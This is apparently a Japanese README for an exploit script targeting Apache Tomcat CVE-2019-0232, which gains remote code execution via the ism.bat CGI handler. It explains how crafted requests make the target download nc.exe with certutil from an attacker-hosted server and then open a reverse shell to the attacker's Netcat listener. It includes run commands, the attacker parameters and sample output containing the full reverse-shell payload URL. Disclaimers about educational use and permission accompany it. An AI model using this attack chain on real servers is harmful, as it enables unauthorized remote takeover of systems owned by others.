
こんにちは、これはCVE-2019-0232の改訂・拡張版コードです。
このスクリプトは、Apache Tomcat の CVE-2019-0232 脆弱性を悪用します。この脆弱性により、ism.bat スクリプトの不適切な処理を通じてリモートコード実行が可能になります。スクリプトは certutil と nc.exe(Netcat)を使用したリバースシェル技法を活用し、脆弱なシステムへのリモートアクセスを取得します。
ism.bat へのリクエスト処理の脆弱性で、攻撃者がサーバー上で任意のコマンドを実行できる可能性があります。この脆弱性は、ユーザー入力の適切な検証が欠如しているために発生し、攻撃者は特別に細工されたリクエストを通じて任意のコマンドの実行を引き起こすことができます。nc.exe ファイルをダウンロードし、それを用いてリバースシェルを起動するために悪用される可能性があります。nc.exe)をサーバー上でホストする必要があります。nc.exe のダウンロード: スクリプトは、脆弱な Tomcat サーバーに細工したリクエストを送信し、certutil を使用して nc.exe(Netcat)ファイルをターゲットマシンにダウンロードさせます。nc.exe がダウンロードされると、別のリクエストを送信してリバースシェルコマンドを実行し、攻撃者の Netcat リスナーに接続を返します。git clone https://github.com/Dharan10/CVE-2019-0232.git
cd CVE-2019-0232
python3 exploit.py
ターゲットホスト: 攻撃対象の Apache Tomcat サーバーの IP アドレス。
ターゲットポート: 対象サーバーのポート(デフォルト: 8080)。
サーバー IP: nc.exe をホストしているサーバーの IP アドレス。
サーバーポート: nc.exe がホストされているポート番号(デフォルト: 80)。
Netcat リスナー IP: リバースシェルを受け取るあなたの IP アドレス。
Netcat リスナーポート: リバースシェルを待ち受けるポート。
[*] Sending payload to download nc.exe...
[+] URL1 Response: 200
[*] Sending payload to execute reverse shell...
[+] URL2 Response: 200
[*] Reverse shell payload URL: http://192.168.1.10:8080/cgi/ism.bat?&nc.exe+192.168.1.100+1234+-e+cmd.exe
正常に実行されると、Netcat リスナーにリバースシェル接続が返ってくるはずです。
このスクリプトは教育目的のみを意図しています。悪意のある活動に使用しないでください。ペネトレーションテストやセキュリティ監査を実施する前に、必ず適切な許可を取得してください。このスクリプトの誤用は法的結果を招く可能性があります。
このエクスプロイトを使用する前に、Apache Tomcat サーバーが CVE-2019-0232 に対してパッチ適用されていないことを確認してください。 ターゲットシステムの構成によっては、スクリプトに管理者権限が必要になる場合があります。
作成者: A!Z3N(Dharan) Made with power!
このプロジェクトは MIT ライセンス の下でライセンスされています。
ただし、自己責任で使用してください。このコードは教育目的のみで提供されています。このコードを使用することにより、その使用に起因するすべての行動に対して全責任を負うことに同意したものとみなされます。このエクスプロイトの誤用または許可なく使用すると、法的結果を招く可能性があります。システム上でセキュリティテストやペネトレーションテストを実施する前に、常に適切な許可を取得してください。
このコードの使用、修正、配布は自由ですが、倫理的な目的に限ります。作成者はこのコードによって生じたいかなる損害についても責任を負いません。
対象システムの所有者の明示的な許可なしにこのエクスプロイトを使用しないでください。